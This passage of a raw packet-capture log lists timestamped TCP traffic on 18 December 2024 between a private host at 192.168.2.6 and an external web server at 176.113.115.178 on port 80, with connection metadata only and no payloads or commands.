                                                                  Dec 18, 2024 13:49:48.113799095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.113812923 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.113852024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.115057945 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.115072966 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.115339994 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.116185904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.116199970 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.116261005 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.117527008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.117542982 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.117651939 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.118486881 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.118500948 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.118514061 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.118561983 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.118561983 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.119636059 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.165637016 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.253765106 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.254060984 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.254123926 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.254344940 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.254952908 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.255323887 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.255367994 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.255733967 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.255808115 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.256313086 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.256514072 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.256603956 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.257230997 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.257735968 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.257814884 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.258280993 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.258492947 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.258656025 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.259196043 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.259474039 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.259632111 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.260328054 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.260729074 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.260797024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.261426926 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.261612892 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.261673927 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.262233973 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.262501955 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.262634993 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.263226986 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.263470888 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.263530016 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.264225960 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.264564991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.264667988 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.265645027 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.266081095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.266299009 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.266623020 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.267064095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.267132044 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.267323971 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.267744064 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.267807961 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.268342972 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.268601894 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.268647909 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.269279003 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.269512892 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.269956112 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.270281076 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.270646095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.270765066 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.271353006 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.271658897 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.271795034 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.272437096 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.272533894 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.272587061 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.273371935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.273571968 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.273612976 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.274492979 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.274532080 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.274637938 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.275330067 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.275592089 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.275666952 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.276390076 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.276565075 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.276704073 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.277326107 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.277849913 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.278067112 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.279452085 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.279679060 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.279731035 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.279824972 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.280160904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.280257940 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.280662060 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.281023979 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.281075001 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.281639099 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.281883955 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.281964064 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.282752991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.283066034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.283775091 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.283901930 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.283929110 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.284598112 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.284693003 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.284818888 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.285607100 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.286245108 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.286417961 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.286945105 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.287062883 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.287214041 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.287411928 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.287587881 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.287956953 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.288050890 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.288872004 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.289334059 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.289422989 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.289750099 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.290245056 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.290580034 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.290620089 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.291095018 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.291223049 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.291578054 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.291929960 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.292000055 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.292571068 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.292778015 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.292892933 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.293452978 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.293708086 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.293759108 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.294440985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.294663906 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.294780016 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.295497894 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.295666933 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.295790911 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.296587944 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.296730995 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.296880960 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.297420979 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.297672987 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.297971964 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.298628092 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.298722029 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.298789978 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.299458981 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.299745083 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.299933910 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.300533056 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.300805092 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.300859928 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.301510096 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.301846981 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.302066088 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.302686930 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.302700043 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.302772045 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.303472996 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.303910017 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.304037094 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.304605007 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.304748058 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.304881096 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.305494070 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.305927038 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.306032896 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.306443930 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.353177071 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.445885897 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.446125984 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.446536064 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.446608067 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.446933031 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.447359085 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.447438002 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.447824001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.448404074 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.448535919 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.448575020 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.449351072 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.449368000 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.449587107 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.449800968 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.450372934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.450599909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.450691938 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.451354980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.451616049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.451687098 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.452356100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.452594042 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.452675104 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.453383923 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.453764915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.453882933 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.454368114 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.454642057 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.454698086 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.455636024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.455821991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.455879927 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.456371069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.456682920 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.456758976 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.457420111 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.457624912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.457753897 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.458424091 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.458668947 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.458796024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.459543943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.459719896 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.459934950 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.460503101 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.460743904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.460819960 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.461487055 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.461678028 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.461744070 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.462455034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.462694883 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.462837934 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.463434935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.463655949 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.463784933 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.464500904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.464652061 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.464708090 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.465486050 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.465778112 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.465909958 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.466762066 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.467336893 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.467439890 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.467852116 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.468533993 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.468887091 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.468916893 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.468976974 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.469124079 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.469604969 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.469979048 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.470186949 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.470529079 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.470727921 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.470784903 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.471474886 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.471920967 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.471999884 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.472709894 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.473140955 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.473197937 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.473599911 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.473871946 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.474204063 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.474522114 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.474730015 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.474832058 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.475517988 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.475749016 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.476259947 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.476622105 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.477197886 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.477334976 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.477571964 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.477786064 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.477829933 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.478738070 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.478835106 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.478899956 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.479583025 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.479809046 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.479872942 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.480782032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.480793953 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.480844021 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.481550932 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.481930971 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.481987000 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.482625961 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.482845068 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.482918024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.483817101 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.483854055 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.483993053 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.484787941 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.484801054 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.485301971 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.485625029 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.486057043 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.486104012 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.486727953 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.487088919 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.487344980 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.487817049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.487833977 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.488238096 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.488914013 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.489098072 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.489300966 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.489636898 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.489907026 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.490050077 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.490637064 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.490969896 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.491089106 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.491615057 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.491954088 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.492017984 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.492644072 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.492902994 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.492985010 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.493701935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.494168043 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.494225979 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.494708061 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.495073080 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.495206118 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:48.495635986 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.495961905 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:48.496269941 CET4982280192.168.2.6176.113.115.178
